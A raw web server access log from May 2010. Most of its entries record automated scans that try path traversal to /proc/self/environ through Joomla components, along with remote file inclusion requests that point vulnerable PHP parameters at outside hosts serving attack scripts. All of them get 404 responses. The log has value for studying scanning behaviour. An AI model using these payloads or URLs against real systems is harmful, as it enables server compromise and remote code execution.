70.38.71.147 - - [19/May/2010:03:03:59 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
94.23.9.198 - - [19/May/2010:03:04:06 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:03:04:06 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
70.38.71.147 - - [19/May/2010:03:04:07 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:03:04:08 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
74.54.63.138 - - [19/May/2010:03:04:08 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:03:04:09 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:03:04:09 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
94.23.9.198 - - [19/May/2010:03:04:32 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:03:04:32 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
213.92.118.159 - - [19/May/2010:03:05:52 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://christenplein.com/id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
213.92.118.159 - - [19/May/2010:03:05:52 -0500] "GET /logs/access_log.1268956800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://christenplein.com/id1.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
213.92.118.159 - - [19/May/2010:03:05:52 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://christenplein.com/id1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
125.248.150.84 - - [19/May/2010:03:07:32 -0500] "GET //inc/header.php/step_one.php?server_inc=http://www.foodntop.com/bbs/data/notice_1/robot.txt???%20? HTTP/1.1" 404 312 "-""Mozilla/5.0"
125.248.150.84 - - [19/May/2010:03:07:32 -0500] "GET /logs/access_log.1263081600//inc/header.php/step_one.php?server_inc=http://www.foodntop.com/bbs/data/notice_1/robot.txt???%20? HTTP/1.1" 404 339 "-""Mozilla/5.0"
125.248.150.84 - - [19/May/2010:03:07:33 -0500] "GET /logs/access_log.1262563200//inc/header.php/step_one.php?server_inc=http://www.foodntop.com/bbs/data/notice_1/robot.txt???%20? HTTP/1.1" 404 339 "-""Mozilla/5.0"
125.248.150.84 - - [19/May/2010:03:07:37 -0500] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.foodntop.com/bbs/data/notice_1/robot.txt???%20? HTTP/1.1" 404 317 "-""Mozilla/5.0"
74.54.63.138 - - [19/May/2010:03:08:41 -0500] "GET /logs/access_log.1273017600/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:03:08:41 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:03:08:41 -0500] "GET /logs/access_log.1273017600/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:03:08:41 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:03:08:41 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:03:08:41 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
94.23.9.198 - - [19/May/2010:03:08:48 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
74.54.63.138 - - [19/May/2010:03:09:28 -0500] "GET /logs/access_log.1273017600/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:03:09:28 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:03:09:28 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:03:09:38 -0500] "GET /logs/access_log.1273017600/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:03:09:38 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:03:09:38 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:03:10:05 -0500] "GET /logs/access_log.1273017600/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:03:10:06 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:03:10:06 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
94.23.9.198 - - [19/May/2010:03:10:22 -0500] "GET /logs/access_log.1273017600/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:03:10:22 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:03:10:23 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:03:10:27 -0500] "GET /logs/access_log.1273017600/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:03:10:27 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:03:10:27 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
207.46.204.190 - - [19/May/2010:03:11:36 -0500] "GET /logs/access_log.1235692800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
70.38.71.147 - - [19/May/2010:03:12:18 -0500] "GET /logs/access_log.1273017600/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:03:12:18 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:03:12:18 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:03:12:30 -0500] "GET /logs/access_log.1273017600/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:03:12:30 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:03:12:30 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:03:13:22 -0500] "GET /logs/access_log.1273017600/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:03:13:22 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:03:13:22 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
89.108.70.32 - - [19/May/2010:03:13:57 -0500] "GET /logs/access_log.1273017600/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
89.108.70.32 - - [19/May/2010:03:13:57 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
89.108.70.32 - - [19/May/2010:03:13:58 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
121.88.4.141 - - [19/May/2010:03:15:21 -0500] "GET ///////admin.lib.inc.php?site_path=http://140.127.114.109:8080/1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
121.88.4.141 - - [19/May/2010:03:15:23 -0500] "GET /logs/access_log.1263081600///////admin.lib.inc.php?site_path=http://140.127.114.109:8080/1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
121.88.4.141 - - [19/May/2010:03:15:23 -0500] "GET /logs///////admin.lib.inc.php?site_path=http://140.127.114.109:8080/1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
67.195.112.180 - - [19/May/2010:03:16:10 -0500] "GET /logs/access_log.1207008000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.54.63.138 - - [19/May/2010:03:18:25 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:03:18:25 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:03:18:25 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
121.88.4.141 - - [19/May/2010:03:19:48 -0500] "GET /logs/access_log.1264723200///////admin.lib.inc.php?site_path=http://140.127.114.109:8080/1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
87.250.255.243 - - [19/May/2010:03:19:58 -0500] "GET /logs/access_log.1227484800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.88.4.141 - - [19/May/2010:03:20:36 -0500] "GET /logs/access_log.1263081600///////admin.lib.inc.php?site_path=http://140.127.114.109:8080/1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
121.88.4.141 - - [19/May/2010:03:20:36 -0500] "GET ///////admin.lib.inc.php?site_path=http://140.127.114.109:8080/1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
121.88.4.141 - - [19/May/2010:03:20:37 -0500] "GET /logs/access_log.1264723200///////admin.lib.inc.php?site_path=http://140.127.114.109:8080/1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
121.88.4.141 - - [19/May/2010:03:20:37 -0500] "GET /logs///////admin.lib.inc.php?site_path=http://140.127.114.109:8080/1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
207.46.199.55 - - [19/May/2010:03:22:06 -0500] "GET /logs/access_log.1253318400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.84 - - [19/May/2010:03:26:06 -0500] "GET /logs/access_log.1163808000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.34.173.211 - - [19/May/2010:03:26:42 -0500] "GET //components/com_forum/download.php?phpbb_root_path=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 318 "-""libwww-perl/5.830"
64.34.173.211 - - [19/May/2010:03:26:42 -0500] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 323 "-""libwww-perl/5.830"
121.88.4.141 - - [19/May/2010:03:27:43 -0500] "GET //install.serverstat.php?mosConfig_absolute_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
121.88.4.141 - - [19/May/2010:03:27:46 -0500] "GET /logs/access_log.1268956800%20%20//install.serverstat.php?mosConfig_absolute_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
121.88.4.141 - - [19/May/2010:03:27:48 -0500] "GET /logs//install.serverstat.php?mosConfig_absolute_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
111.67.9.133 - - [19/May/2010:03:27:52 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
121.88.4.141 - - [19/May/2010:03:29:35 -0500] "GET /logs/access_log.1263081600///////admin.lib.inc.php?site_path=http://140.127.114.109:8080/1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
121.88.4.141 - - [19/May/2010:03:29:35 -0500] "GET /logs///////admin.lib.inc.php?site_path=http://140.127.114.109:8080/1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
121.88.4.141 - - [19/May/2010:03:29:36 -0500] "GET ///////admin.lib.inc.php?site_path=http://140.127.114.109:8080/1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
207.46.195.236 - - [19/May/2010:03:29:36 -0500] "GET /logs/?N=A HTTP/1.1" 200 6146 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.88.4.141 - - [19/May/2010:03:29:38 -0500] "GET /logs/access_log.1264723200///////admin.lib.inc.php?site_path=http://140.127.114.109:8080/1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
121.88.4.141 - - [19/May/2010:03:31:45 -0500] "GET /logs/access_log.1265241600//install.serverstat.php?mosConfig_absolute_path=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
87.250.255.243 - - [19/May/2010:03:35:43 -0500] "GET /logs/access_log.1259539200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [19/May/2010:03:46:58 -0500] "GET /logs/access_log.1216252800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
198.170.141.58 - - [19/May/2010:03:50:33 -0500] "GET /logs/index.php?option=com_swmenupro&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
198.170.141.58 - - [19/May/2010:03:50:33 -0500] "GET /index.php?option=com_swmenupro&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
111.67.9.133 - - [19/May/2010:03:52:42 -0500] "GET /logs/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.823"
111.67.9.133 - - [19/May/2010:03:52:43 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
70.38.71.147 - - [19/May/2010:03:53:28 -0500] "GET /index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
70.38.71.147 - - [19/May/2010:03:53:31 -0500] "GET /index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
94.23.9.198 - - [19/May/2010:03:53:42 -0500] "GET /index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.9.198 - - [19/May/2010:03:53:45 -0500] "GET /index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
89.108.70.32 - - [19/May/2010:03:54:36 -0500] "GET /index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
207.46.195.230 - - [19/May/2010:03:55:06 -0500] "GET /logs/access_log.1245456000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [19/May/2010:03:58:48 -0500] "GET /logs/access_log.1234742400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.190.102.21 - - [19/May/2010:03:59:11 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
121.190.102.21 - - [19/May/2010:03:59:11 -0500] "GET /logs/access_log.1265241600//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
121.190.102.21 - - [19/May/2010:03:59:11 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
121.190.102.21 - - [19/May/2010:04:00:05 -0500] "GET /logs/access_log.1264636800//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
111.67.9.133 - - [19/May/2010:04:00:58 -0500] "GET /index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
212.26.227.88 - - [19/May/2010:04:05:29 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.licht-planung.at//media/auto1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
212.26.227.88 - - [19/May/2010:04:05:29 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.licht-planung.at//media/auto1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
212.26.227.88 - - [19/May/2010:04:05:29 -0500] "GET /logs/access_log.1271376000//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.licht-planung.at//media/auto1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
207.46.13.51 - - [19/May/2010:04:06:06 -0500] "GET /logs/access_log.1236902400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.26.227.88 - - [19/May/2010:04:06:32 -0500] "GET /logs/access_log.1263772800//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.licht-planung.at//media/auto1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
216.245.220.19 - - [19/May/2010:04:12:03 -0500] "GET //components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.245.220.19 - - [19/May/2010:04:12:03 -0500] "GET /logs/access_log.1264723200//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
216.245.220.19 - - [19/May/2010:04:12:03 -0500] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
216.245.220.19 - - [19/May/2010:04:12:10 -0500] "GET /logs/access_log.1263081600//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
216.245.220.19 - - [19/May/2010:04:12:11 -0500] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
216.245.220.19 - - [19/May/2010:04:12:11 -0500] "GET //components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.245.220.19 - - [19/May/2010:04:12:11 -0500] "GET /logs/access_log.1264723200//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
216.245.220.19 - - [19/May/2010:04:12:19 -0500] "GET /logs/access_log.1263081600//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
87.250.255.243 - - [19/May/2010:04:12:26 -0500] "GET /logs/access_log.1223769600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.51 - - [19/May/2010:04:14:36 -0500] "GET /logs/access_log.1214611200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
111.67.9.133 - - [19/May/2010:04:14:53 -0500] "GET /logs/access_log.1273276800/index.php?option=com_myblog&Itemid=15&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.823"
121.190.102.21 - - [19/May/2010:04:14:55 -0500] "GET /logs//inc/urgency_type.php?mosConfig_absolute_path=http://www.armycadetleagueab.ca/cache/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
121.190.102.21 - - [19/May/2010:04:14:55 -0500] "GET //inc/urgency_type.php?mosConfig_absolute_path=http://www.armycadetleagueab.ca/cache/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
